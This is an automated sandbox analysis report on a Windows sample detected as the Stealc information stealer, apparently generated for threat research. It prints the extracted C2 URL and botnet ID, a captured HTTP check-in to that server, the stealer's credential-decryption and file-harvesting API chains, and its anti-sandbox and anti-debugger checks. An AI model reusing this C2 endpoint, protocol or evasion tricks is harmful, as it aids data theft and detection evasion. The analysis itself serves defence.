Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1542671
MD5:3833a1b7c23d66eecec6b16ddf5cf540
SHA1:05182934e239a8e6715ada16e0ddcde3b7598e05
SHA256:96f09e8bd3f67c287a0bb1529d5220d9496a233fba5b1608366a2c280a864dd2
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 5752 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 3833A1B7C23D66EECEC6B16DDF5CF540)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/e2b1563c6670f193.php", "Botnet": "puma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2137808772.00000000015EE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000003.2096593419.00000000053F0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 5752JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 5752JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.a40000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-26T05:55:08.006858+020020442431Malware Command and Control Activity Detected192.168.2.549704185.215.113.20680TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Found malware configuration
                Source: 0.2.file.exe.a40000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/e2b1563c6670f193.php", "Botnet": "puma"}
                Multi AV Scanner detection for domain / URL
                Source: http://185.215.113.206/Virustotal: Detection: 13%Perma Link
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_00A4C820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A49AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00A49AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A47240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00A47240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A49B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00A49B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A58EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00A58EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A538B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00A538B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A54910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00A54910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00A4DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00A4E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00A4ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A54570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00A54570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A53EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00A53EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00A4F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4F68A FindFirstFileA,0_2_00A4F68A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A416D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00A416D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00A4DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00A4BE70

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.206:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.206/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDAAKJEGCFCAKEBKJJEHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 44 41 41 4b 4a 45 47 43 46 43 41 4b 45 42 4b 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 41 35 43 35 37 43 45 37 41 38 39 35 31 34 37 30 31 38 32 35 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 41 41 4b 4a 45 47 43 46 43 41 4b 45 42 4b 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 70 75 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 41 41 4b 4a 45 47 43 46 43 41 4b 45 42 4b 4a 4a 45 2d 2d 0d 0a Data Ascii: ------GHDAAKJEGCFCAKEBKJJEContent-Disposition: form-data; name="hwid"4A5C57CE7A89514701825------GHDAAKJEGCFCAKEBKJJEContent-Disposition: form-data; name="build"puma------GHDAAKJEGCFCAKEBKJJE--
                Source: Joe Sandbox ViewIP Address: 185.215.113.206 185.215.113.206
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A44880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00A44880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDAAKJEGCFCAKEBKJJEHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 44 41 41 4b 4a 45 47 43 46 43 41 4b 45 42 4b 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 41 35 43 35 37 43 45 37 41 38 39 35 31 34 37 30 31 38 32 35 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 41 41 4b 4a 45 47 43 46 43 41 4b 45 42 4b 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 70 75 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 41 41 4b 4a 45 47 43 46 43 41 4b 45 42 4b 4a 4a 45 2d 2d 0d 0a Data Ascii: ------GHDAAKJEGCFCAKEBKJJEContent-Disposition: form-data; name="hwid"4A5C57CE7A89514701825------GHDAAKJEGCFCAKEBKJJEContent-Disposition: form-data; name="build"puma------GHDAAKJEGCFCAKEBKJJE--
                Source: file.exe, 00000000.00000002.2137808772.00000000015EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
                Source: file.exe, 00000000.00000002.2137808772.00000000015EE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2137808772.0000000001631000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2137808772.0000000001647000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
                Source: file.exe, 00000000.00000002.2137808772.00000000015EE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2137808772.0000000001647000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.2137808772.0000000001647000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php%
                Source: file.exe, 00000000.00000002.2137808772.0000000001647000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php/
                Source: file.exe, 00000000.00000002.2137808772.0000000001647000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php9
                Source: file.exe, 00000000.00000002.2137808772.0000000001647000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/e2b1563c6670f193.phpE
                Source: file.exe, 00000000.00000002.2137808772.0000000001647000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/e2b1563c6670f193.phpa
                Source: file.exe, 00000000.00000002.2137808772.0000000001647000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/m
                Source: file.exe, 00000000.00000002.2137808772.0000000001647000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/t
                Source: file.exe, 00000000.00000002.2137808772.0000000001647000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/ws
                Source: file.exe, 00000000.00000002.2137808772.00000000015EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206kz.P6

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E828210_2_00E82821
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB58020_2_00EB5802
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DA895A0_2_00DA895A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DFC97F0_2_00DFC97F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EBB1560_2_00EBB156
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E1392C0_2_00E1392C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E0B11B0_2_00E0B11B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CF12630_2_00CF1263
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CE32600_2_00CE3260
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E062510_2_00E06251
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E102540_2_00E10254
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DFDCDA0_2_00DFDCDA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E07CED0_2_00E07CED
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D4D4CF0_2_00D4D4CF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DC3C5D0_2_00DC3C5D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D4F4130_2_00D4F413
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E0F5B20_2_00E0F5B2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E02D440_2_00E02D44
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB66530_2_00EB6653
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D606080_2_00D60608
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CBDE330_2_00CBDE33
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E097E00_2_00E097E0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CDB7870_2_00CDB787
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DFF7070_2_00DFF707
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 00A445C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: rhebxyzr ZLIB complexity 0.9951511497101891
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A58680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00A58680
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A53720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00A53720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\0TX10615.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1834496 > 1048576
                Source: file.exeStatic PE information: Raw size of rhebxyzr is bigger than: 0x100000 < 0x199c00

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.a40000.0.unpack :EW;.rsrc :W;.idata :W; :EW;rhebxyzr:EW;gzayextq:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;rhebxyzr:EW;gzayextq:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A59860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00A59860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1c70fa should be: 0x1c8212
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: rhebxyzr
                Source: file.exeStatic PE information: section name: gzayextq
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CA58C5 push 08B2AEA6h; mov dword ptr [esp], ebp0_2_00CA755F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CA58C5 push ebx; mov dword ptr [esp], eax0_2_00CA7587
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CA58C5 push eax; mov dword ptr [esp], esi0_2_00CA758B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010D1117 push 0696022Ah; mov dword ptr [esp], ecx0_2_010D114A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EE18A5 push edx; mov dword ptr [esp], eax0_2_00EE18ED
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EE18A5 push 0877DADCh; mov dword ptr [esp], ebp0_2_00EE1905
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB20B0 push edx; mov dword ptr [esp], ebx0_2_00EB2130
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CE58B4 push ebx; mov dword ptr [esp], edi0_2_00CE58C5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CE58B4 push ecx; mov dword ptr [esp], ebx0_2_00CE5926
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CE58B4 push 0D164635h; mov dword ptr [esp], eax0_2_00CE592F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CE58B4 push esi; mov dword ptr [esp], edx0_2_00CE5944
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CE58B4 push 7B888845h; mov dword ptr [esp], ecx0_2_00CE59D4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CE58B4 push eax; mov dword ptr [esp], 00000004h0_2_00CE5A15
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CE58B4 push ecx; mov dword ptr [esp], 7FC7E779h0_2_00CE5A43
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CE58B4 push esi; mov dword ptr [esp], ebx0_2_00CE5AA7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A5B035 push ecx; ret 0_2_00A5B048
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010D1195 push ecx; mov dword ptr [esp], esp0_2_010D11C7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010D1195 push edi; mov dword ptr [esp], 327A8E89h0_2_010D11F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010D1195 push 4A42F343h; mov dword ptr [esp], edx0_2_010D12C7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010D1195 push ecx; mov dword ptr [esp], eax0_2_010D12E3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010D1195 push edi; mov dword ptr [esp], eax0_2_010D132E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E7C041 push ebx; mov dword ptr [esp], edx0_2_00E7C071
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E82821 push 11E46429h; mov dword ptr [esp], ebp0_2_00E82856
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E82821 push eax; mov dword ptr [esp], edi0_2_00E828A1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E82821 push edi; mov dword ptr [esp], ebx0_2_00E82973
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E82821 push 7F4104CBh; mov dword ptr [esp], ebx0_2_00E82991
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E82821 push ecx; mov dword ptr [esp], eax0_2_00E829F1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E1902B push ebp; mov dword ptr [esp], edx0_2_00E19066
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E1902B push ebx; mov dword ptr [esp], 56284488h0_2_00E19084
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E1902B push 129BD874h; mov dword ptr [esp], ecx0_2_00E190C1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E1902B push edx; mov dword ptr [esp], eax0_2_00E190E6
                Source: file.exeStatic PE information: section name: rhebxyzr entropy: 7.953785461765037

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A59860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00A59860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13651
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA1C93 second address: CA1C9C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E092AE second address: E092B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E18A70 second address: E18A74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E18FDE second address: E18FE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1B0E8 second address: E1B0EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
